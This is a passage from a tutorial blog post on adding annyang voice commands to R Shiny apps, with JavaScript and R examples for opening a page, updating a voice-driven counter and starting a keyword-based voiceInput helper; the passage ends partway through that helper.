&lt;p&gt;I love R and I love &lt;a href="https://shiny.rstudio.com/gallery/" rel="external"&gt;Shiny&lt;/a&gt;. One of the things I really like about Shiny is the ease with which you can incorporate other JavaScript-based tools and libraries. By my own admission, my &lt;a href="https://en.wikipedia.org/wiki/JavaScript" rel="external"&gt;JavaScript&lt;/a&gt; skills are definitely lacking, but there are so many cool libraries out there that can really make visualisation and interaction with displayed content come alive. One such library, which I came across a while ago, is &lt;a href="https://www.talater.com/annyang/" rel="external"&gt;annyang&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="what-is-annyang"&gt;What is annyang?&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;“annyang is a tiny javascript library that lets your visitors control your site with voice commands. annyang supports multiple languages, has no dependencies, weighs just 2kb and is free to use.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Annyang works with all browsers that implement the speech recognition interface of the Web Speech API and makes it extremely easy to get started. Here is some JavaScript that you can include inside raw HTML to add a voice command that listens for the phrase &lt;strong&gt;Jumping Rivers&lt;/strong&gt; and takes you to our &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;home page&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;script src&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#f85149"&gt;/script&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;script&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;// detect whether it is supported in the browser
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(annyang) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// define some commands
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; commands &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// on hearing &amp;#34;Jumping Rivers&amp;#34;, call this function
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Jumping Rivers&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.open(&lt;span style="color:#a5d6ff"&gt;&amp;#39;https://www.jumpingrivers.com&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;_blank&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// register the defined commands
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// start listening
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color:#f85149"&gt;/script&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="more-complex-commands"&gt;More complex commands&lt;/h3&gt;
&lt;p&gt;In addition to explicit phrases like the above, annyang can also understand named variables, optional phrases and multi-word text (splats). I refer you to the guides on the &lt;a href="https://www.talater.com/annyang/" rel="external"&gt;annyang page&lt;/a&gt; for further info.&lt;/p&gt;
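&lt;p&gt;As a rough sketch of the three pattern types mentioned above, the commands object below uses annyang’s documented pattern syntax. The phrases, handler bodies and the &lt;code&gt;lastAction&lt;/code&gt; variable are made up for illustration and are not part of the original example.&lt;/p&gt;

```javascript
// Sketch: one command per pattern type, using annyang's pattern syntax.
// The phrases and handlers are illustrative assumptions.
var lastAction = null;

var commands = {
  // Named variable: ":page" captures a single spoken word.
  'open :page': function(page) {
    lastAction = 'open ' + page;
    return lastAction;
  },
  // Optional phrase: the words in parentheses may be left out.
  'go (to the) home page': function() {
    lastAction = 'home';
    return lastAction;
  },
  // Splat: "*query" captures all the words said after "search for".
  'search for *query': function(query) {
    lastAction = 'search ' + query;
    return lastAction;
  }
};

// Register the commands only when annyang has loaded and is supported.
if (typeof annyang !== 'undefined') {
  if (annyang) {
    annyang.addCommands(commands);
    annyang.start();
  }
}
```

&lt;p&gt;Because each handler is a plain function, it can be called directly, for example &lt;code&gt;commands['search for *query']('shiny apps')&lt;/code&gt;, to check its behaviour without a microphone.&lt;/p&gt;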
&lt;h2 id="include-it-in-shiny"&gt;Include it in Shiny&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note: This will not work in the RStudio browser. If you run the code yourself, open the app in another browser, preferably Chrome. You will likely have to give the browser permission to use the microphone too.&lt;/strong&gt;&lt;/p&gt;
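&lt;p&gt;Whether voice commands work comes down to whether the browser exposes the speech recognition interface of the Web Speech API. The &lt;code&gt;if(annyang)&lt;/code&gt; guard in the snippets here already handles that case. The helper below is only a sketch for showing users a message, and its name &lt;code&gt;hasSpeechRecognition&lt;/code&gt; is an assumption rather than part of annyang or Shiny.&lt;/p&gt;

```javascript
// Sketch: report whether a window-like object exposes the Web Speech API
// recognition interface. The function name is an illustrative assumption.
function hasSpeechRecognition(win) {
  if (!win) {
    return false;
  }
  // Chrome exposes the interface under a "webkit" prefix.
  return Boolean(win.SpeechRecognition || win.webkitSpeechRecognition);
}

// In a browser, pass the global window; elsewhere fall back to an empty object.
var supported = hasSpeechRecognition(typeof window !== 'undefined' ? window : {});
console.log(supported ? 'Voice commands available' : 'Voice commands unavailable in this browser');
```

&lt;p&gt;Passing the window object in as an argument keeps the check easy to try outside a browser.&lt;/p&gt;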
&lt;p&gt;Shiny makes it easy to include snippets of JavaScript code in your apps through the HTML &lt;code&gt;tags&lt;/code&gt;. We could include the above command in a Shiny app with the following code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Simple Shiny App - just say &amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; if(annyang) {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; var commands = {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;Jumping Rivers&amp;#39; : function() {
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; window.open(&amp;#39;https://www.jumpingrivers.com&amp;#39;, &amp;#39;_blank&amp;#39;);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; }&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s potentially easier to keep your JavaScript in a separate file and include it using &lt;code&gt;includeScript()&lt;/code&gt; in your UI definition. So we have two files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;voice.js&lt;/strong&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(annyang){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; commands &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Jumping Rivers&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.open(&lt;span style="color:#a5d6ff"&gt;&amp;#39;https://www.jumpingrivers.com&amp;#39;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#39;_blank&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;app.R&lt;/strong&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;includeScript&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;voice.js&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;See the &lt;a href="https://jumpingrivers.shinyapps.io/speech/" rel="external"&gt;Shiny App&lt;/a&gt; in action.&lt;/p&gt;
&lt;h3 id="what-about-changing-r-variables"&gt;What about changing R variables?&lt;/h3&gt;
&lt;p&gt;Now I think that by itself is kind of cool. But it would be much more useful if we could use this to interact with R objects. Fortunately, Shiny makes this possible too. The JavaScript function &lt;code&gt;Shiny.onInputChange('var', value)&lt;/code&gt; sets &lt;code&gt;value&lt;/code&gt; on the reactive input &lt;code&gt;input$var&lt;/code&gt;, so the server can respond to it like any other input.&lt;/p&gt;
&lt;p&gt;As a simple example, let&amp;rsquo;s create a counter that increments when I say &lt;strong&gt;“Count”&lt;/strong&gt;. Our &lt;code&gt;voice.js&lt;/code&gt; file would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(annyang) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; commands &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;count&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;+=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Shiny.onInputChange(&lt;span style="color:#a5d6ff"&gt;&amp;#39;counter&amp;#39;&lt;/span&gt;, value);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; };
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.addCommands(commands);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; annyang.start();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and a Shiny app that displays the counter might be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;includeScript&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;voice.js&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;counter)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Check out the end result &lt;a href="https://jumpingrivers.shinyapps.io/Speech2/" rel="external"&gt;app&lt;/a&gt;.&lt;/p&gt;
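&lt;p&gt;The counter above relies on &lt;code&gt;Shiny.onInputChange()&lt;/code&gt;. From Shiny 1.1 the same function is also available as &lt;code&gt;Shiny.setInputValue()&lt;/code&gt;, which accepts a &lt;code&gt;priority: 'event'&lt;/code&gt; option so that the server is notified even when the value has not changed. The sketch below assumes a hypothetical helper, &lt;code&gt;sendToShiny&lt;/code&gt;, and uses a stand-in object in place of the real &lt;code&gt;Shiny&lt;/code&gt; global so that it can be run outside an app.&lt;/p&gt;

```javascript
// Sketch: send a value to Shiny, preferring setInputValue when it exists.
// "shiny" is passed in so the helper can be tried without a running app;
// the helper name is an illustrative assumption.
function sendToShiny(shiny, inputId, value) {
  if (typeof shiny.setInputValue === 'function') {
    // priority "event" asks Shiny to notify the server even if the value is unchanged.
    shiny.setInputValue(inputId, value, { priority: 'event' });
  } else {
    // Older Shiny versions only provide onInputChange.
    shiny.onInputChange(inputId, value);
  }
}

// Stand-in for the browser's Shiny object, recording what it receives.
var received = [];
var fakeShiny = {
  setInputValue: function(id, value, opts) {
    received.push({ id: id, value: value, priority: opts.priority });
  }
};

var value = 0;
value += 1;
sendToShiny(fakeShiny, 'counter', value);
console.log(received[0].id + ' = ' + received[0].value);
```

&lt;p&gt;Inside &lt;code&gt;voice.js&lt;/code&gt; the call would become &lt;code&gt;sendToShiny(Shiny, 'counter', value)&lt;/code&gt;. For a counter the value always changes, so the priority option matters more when the same phrase might be spoken twice in a row.&lt;/p&gt;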
&lt;h2 id="but-i-dont-know-any-javascript-and-dont-want-to-know"&gt;But I don’t know any Javascript and don’t want to know&lt;/h2&gt;
&lt;p&gt;The above is all well and good if you are happy to write the JavaScript code for each of your apps. But if you really don’t want to, or don’t feel comfortable doing that, then we could define an R function which registers a keyword to start listening (think Alexa), takes everything spoken after the keyword and stores the string as an R object. This way all processing of the result can be done in the comfort of the R language. One such implementation of this using the annyang splat is&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# I have used the keyword jarvis as default because I like iron man&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# default value is an empty string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# necessary to choose an &amp;#34;inputId&amp;#34; to bind the value to&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;voiceInput &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(inputId, keyword &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;jarvis&amp;#34;&lt;/span&gt;, value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tagList&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;singleton&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;//cdnjs.cloudflare.com/ajax/libs/annyang/2.6.0/annyang.min.js&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;HTML&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;annyang.start({ autoRestart: true, continuous: true});&amp;#34;&lt;/span&gt;)))),
